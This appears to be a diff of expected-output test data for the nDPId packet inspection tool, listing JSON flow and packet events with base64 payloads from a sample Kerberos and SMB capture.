
-00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} 
-00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337929790,"pkt":"pB9ywglqAAgCHEeuCABFAAEXABdAAIAGkNisEAjJrBAICMAFAFiynbRHbznTnlAYAQAf5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDmhhcHB5Y3JhZnQub3JnoyMwIaADAgECoRowGBsGa3JidGd0Gw5oYXBweWNyYWZ0Lm9yZ6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7AFheoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} +00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337929790,"pkt":"AAgCHEeupB9ywglqCABFAAE+ExRAAIAGfbSsEAgIrBAIyQBYwAVvOdOesp21NlAYAQCkkQAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDBjUgpgMCARmpEBsOaGFwcHljcmFmdC5vcmeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} +00729{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1549337929811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337929811,"pkt":"pB9ywglqAAgCHEeuCABFAAFnABtAAIAGkISsEAjJrBAICMAGAFganBtaQ2U1slAYAQDaGgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4YERcga5zFfjuo7+oqo0hJ6Udj7efOwOKKYJj6PKpxuETgzDcdt27IvGW9sEQ18QPUV\/drVuLVBwwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOaGFwcHljcmFmdC5vcmejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETsAWF6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} 
+00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1549337929812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337929812,"pkt":"AAgCHEeupB9ywglqCABFAACYExlAAIAGflWsEAgIrBAIyQBYwAZDZTtmGpwcmVAYAQDnsgAAX5hri3Z\/opje40K53kwDKo2\/CTegm0pJkWpLVNFlnn\/MakUFXqKHv4CDtH2CbQqvJq\/ecJgxH2EwrzVmUcQk2zqXXjIwbkyszZ9\/Xc6IEgQ4qiI64lPzINS7ueVTbdUXk\/8v52QxoGdMilBjjWTAcQ=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337929815,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337929815,"pkt":"pB9ywglqAAgCHEeuCABFAACxACFAAIAGkTSsEAjJrBAICMAHAFgBsoC8gS4auFAYAQDUqQAAiNeE+tCJIo9Cz1KFHGicigIlxkFIEVkb70vifDKvvi6NwB24GlkehWdocuUvESpeAqtSofWtuKDm2yskVOheE+r4DxaQxRLncJy9zYBP+p7ofQvBukmarkg+oY3ctA8jgj5BSy2yi42NlxJjhcjuX3ByLG+GD20zq41Le0TbPh0TFS5qkRb0Q24="} +00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337929815,"pkt":"AAgCHEeupB9ywglqCABFAACbEx9AAIAGfkysEAgIrBAIyQBYwAeBLiBsAbKBRVAYAQBP\/wAA1H56bb56rLTzhI\/so6pGl6jILu03bHY2ZWl4A41JY07Kavo1sQRKhlNPx3vE\/LdSF6BX6NLW1Fm3Tdmvr7ZEbPWOq8FZs9c0RBY7wJbwPUW44FlC0vhqJn1yGB3K1Fxl0gPqAAMzMrhupJQMQzjV4fgdag=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337929816,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/ACZAAIAGjCGsEAjJrBAICMAIAFgkzleN\/pyBM1AYAQCd1QAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1l4LwpNuTjPo\/WSca61wgawIInNQ2vTGqwCxtV1QigPfApKXxUIq16oPsvd5TUFFBoZ3psSaal0IeVBLFx\/BX1XOMXvlpVRB9MsTpZwTQ9ax1GLB6I2i5bbUZpknsnBAKrSXL695P06nXI2pxBPckcoFwJAlSBEmG2XByE8IS7rO1EarXMbJ6Y6aTY3qAJfaaRab4vHhRG2Vuf+5JWuR5w1NLPXeeoD\/rArSk0gCVLkR21SKfZcS\/vqPldqO0np7TLmMBVoYjsl6PiI0+4z2cMBft\/qbxRIxb8y1vWhjoJ64ue7lCoT2cvFOdVWD\/WH\/fANzw0ML9F0vLIXCgI1qi1sWcerxATeYpOyo7DWpsJioH9jxAPx+B6RM+9U5zQIKM9BdT3C3olrkQMfOua6FPtyqIt9kVcakdowBTS4+NidzK5sGlYIRntlAxGR8YU5brzwGdboEMfsAHK11qtTE6t\/tDmgr1+cFgW34p7q9yjtfw3IlMfNtNF6cVYmOh6G5Wnxcfjqbsrpj7Kw6mjBwfKtaYNJG6XthlVKo9I4FpdysFIteChs2N+mQtafp0AWZxKjjDKO8sohbJklYhyoJOto52hds26FAU4LmrIc5fMmADp1PG\/tBDi0BnZ3SimtoeWyM2fnwWhBrH67Gc6TeKPHSeyVFwR1fSnMxZTlzS7KXwLa62U6BZ0WNCBZzIdUTje6\/aUFTq4XeeR0Z7Vh6Z9DZ9om\/9wiQsBPMMalPRPnqfmOZT7HV5yr74UqmbVg1OWh8En3RVYoEzl+U9UxwXXFIR5zUwJrSv4BRCrfouK2f87lMtCFEg\/zEl+Ya6jB+A9XZfPbLOpJ+x1ZsBKiE7MFw9X4cPsiIvoIaHcwmirVOaa9JrhuL72qg0GrV2LWFm+xJt5NjWGhgRHFok1jp2URmHs7J3zvdeb+nbPHLvYUdtkqwb3aoYEr1Xmflw8UpDr6MDbT2en\/\/11z39903bvFGohUv62WN4swCRiY9JjXJUs610D4Xxus5+CL0zgzTQQAxEvC4LL9CQELhrXgdhbQmsotNytXnsgYuKhF4RMS5q5UH8sx1AGsmSntAJ\/W4iO+\/MbV3oU5HdPpcERFm3hfRy\/GBSS75vadxxOcRHZA6iF9\/pQ9BlFHhHcWkaQuZyUL6qH1sbSQyui0sXjtHojjpnPlsTpEM9hpMt6LhooASI6ATNe\/Xw7kB+HTJthDR\/bJnXbftcEdtnk7dLQYL5MfhSH8BDyuI9MMLmdpozP+V7mPT5HhUnsqRSQWCVyfiuDhL0shZpk8
3f0xNTTmK8fhSYF8Q1BGkgZwwgZmgAwIBEqKBkQSBjpT6WKZ4R5UUi5WTtSgEkEd7jMLa6AoUPu4TwrcLKGcmB9vngXIzOhZvqCgHdzOkHetRjgLUyTIXem1PFxz6mY8TxQcIZDyb19SN3Nd3sKaxs2IYEv7YHwXG6E8LM8hJLH2m\/TyiwnWxB70uZ574gAkF4FD1Zq+qMVWQ8VxsOQkGL92ElZ2TaAS4GGYCEnUwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7NBe6oBTADAgES"} +00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 
+02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337929816,"pkt":"AAgCHEeupB9ywglqCABFAAXMEyNAAIAGeResEAgIrBAIyQBYwAj+nIEzJM5dJFAYAQC28wAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9ZmgNa1dr3wGd87q5o3XWLsTIWysbTgkwJr+Tn54CyV4AH6vlEgusASRdJcyvN0onPWOO9TStPkihUEobLQ8WG5\/BAe\/pJm76NJeRjK9kGGi8G\/0XbFCYSPepa5PQwmUgAjsgxX98uOoIoeMgpxrDD2I4YnqT0o9T7E4u8XbTiIf+v3cdcN4dCZ+EoTKAM9GSdtpSP62\/Xb+2PxUXMWzXRKdBV4GPRc7M\/f3KRdK529+2pM4yLgF6mfdzw1YttOYiTQBSOIseZU5L5pWWwIAYUeadQLWeGW7MCmuOiezPfzHOKXT\/hMqEB\/2Egds2KA7Hm\/oP01r9IU6p42tCtn+I4EWSm5ZkiMAIXP6SCiOdO2PbdtR\/4GK9kZARZpgtLJG+aGmFpRzNAdcgcLMHN2OlX0J6+piruBM7Ww3kqLpZgruCuGx8K+d\/8FApmAeWnLmXbD3fu1T00fGd6fdKrkgCl98Sy4I0iKgJr019SubVPh\/tLfXvOPHFTskrZiab\/lkJMa\/lcaCHUWtHfBuxSsNJt7gody42oqvvYHikEn7VlQJDi\/u8KzU07HljjjoqhCYV678B3YcCsVdGefRzEoUzSdH\/BYJGW+CkosfzR7MiRBWyvn77tCF67oxZ3T5EhVst6OUOt05ejCBeF0j2P8Sa6RL1vPg6TCt7KX5yXzGdJtuRQYFzwHms4Ux+JYQXrmLh2ixoc55gWooUap7xcPOrj9EtgR7efu2PqGQVuytvq6rdV+3QUFA8AufxbPXK507+RBmLMcLcxZAxOp7SQc\/Ay3c\/ORhr+fWLV6VFfX75zufwBySCOGvrbuFXK0SnMVFwylor3lGY2Czl7Y5QKDcK4+FS+SJKTqaxj0EFxa2D+DbGLwbVt3zt9+tPhI+pr7vL0LtIL0O055Y3MLTTiVoB4FnEuGzQivRnPbXzFFcdCIUDcAh26XtB4LCpmd+fBTcLafa5ZKQ2nsR\/2LH7kpZxim50Hcvtyd5PzGPwKSVk2Q+psnZ0IehfsbwhALTs\/RQSOb7Rq41AGgy7OAH5YvpBKSd7qUDfb1gtLh6EIYhMprEuGvAg42lOnEYktaA8Y0X4PyM72xSTA9ZN+CxfcvwiIlvHf11TL5C5ZRBUy3du\/RJjPcfxsjqIdqVfXMDys4DGOvXOODvANQyMdpD2WSRWTBduQ+1useq7xNugt3rmAScfUohAT\/giN4TexFk96WUfGs376rRqExitzbuece0s6lptdaN+3sKDC1NFILlW4MQPBHpc3ComgefM9jAmeqLxMUur1iJW82d2i1F5BNiRpTZ
EFf7MD9poIBJjCCASKgAwIBEqKCARkEggEVQDvO7+WVQbXswJT\/WKenjoLOTOUb7xtnQSDSvTALA7cFBjKmG7py2Ll3YHsUrZQaKL2ZgS2bNcKYx\/3+lfvv+kAlvcN39ExBH9j9AGm8H1cRnFwNhRWCETnioXg\/P1Y2p+e3F0h6bOneEdLiePwHJv9FonrRV61HKyJDpzH6E0h5BR7t2eo\/60DJORIRuiguwoofBgNuIj9IIWatzAufVetcbqrWIpOgXa8Tl5itQ\/bI2zF6hwUS3TRThkmm+Lz7J7LBceoySEetzaEsRZtQYN6tENYmlD5+VEJvmJ\/Gk593lHeRAE07ZMXwY1fmEib\/vL\/sBgCUMH7CIYMAL4GjstMrJCbIeZhyoYmoahgOuedSq46aMw=="} +00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929817,"flow_last_seen":1549337929817,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337929817,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1549337929817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337929817,"pkt":"pB9ywglqAAgCHEeuCABFAAELACpAAIAGkNGsEAjJrBAICMAEAb1XsKRSOc8tT1AYAP5XOQAAtEaCpoUNMQEcRu8rXL+flRkpXPhHudnte7juaoAeTLu\/yTOr\/klMHDKYHSz0JIIsigIVsBaMl3PyJLoeb\/thjoYGSwkEC2m4nRdpRXAof0BuI3WnXPinh7MhPVCaTGyJNfqfVu\/1dc4+HXKYy76MWWV4zUtzQAeAZlVdIbuoLUlvFXjFSw5Ryb7lDA5ay5XLMnQY1U2bYUt6MYxBsLvHXZpUwBGPjxstpVTddlgnyYV1MOsJQv5Du0utIGTzTo6LpQrGUrUbi+j64I7Cmr+KeRuwdhEzhGbc+mJlwRYjD6cvIxA="} +00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1549337929818,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337929818,"pkt":"AAgCHEeupB9ywglqCABFAAEsEydAAIAGfbOsEAgIrBAIyQG9wAQ5zy1PV7ClNVAYAQBD3AAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAIAAAAAAAAA\/\/4AAAAAAABZAAAAAAQAAM9KX1xrFqd60K9wkt\/rc1cJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbaDd4i7\/ItyR1a9jC52avEiTOhersM4IXB2s8eeK3O+ftonNzS3toSakh8sE2tBVm3gbqMBKq1zSZzBBR6cu+Hrjxp\/3xoJEFPVC\/4y\/BWmosce7zt2RHazTIcgt7F0qD+5oY0gWkTgMB+VU0Ro="} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929981,"flow_last_seen":1549337929981,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337929981,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1549337929981,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337929981,"pkt":"pB9ywglqAAgCHEeuCABFAADBADZAAIAGkQ+sEAjJrBAICMAKAFgVCzarRRAS7FAYAQB2LAAAqoGWMIGToAMCARKigYsEgYi0+C7lIM6lpWfLcf2ezyusajpC0TYc1OX1vmb3DhkyjRtC5TeZRg9Wzt\/ubCTSXWpwv+zrJOhZpUKxM\/PhogQbKSmJJuvTC3n4CxJc9SponZNFKF1Kt9\/yiDsesCZaEKdbgZEf1rZ1aHAiihciexKw\/Qr8RPyDjBEhr0yc0K8+XP7zeT3kqKdm"} 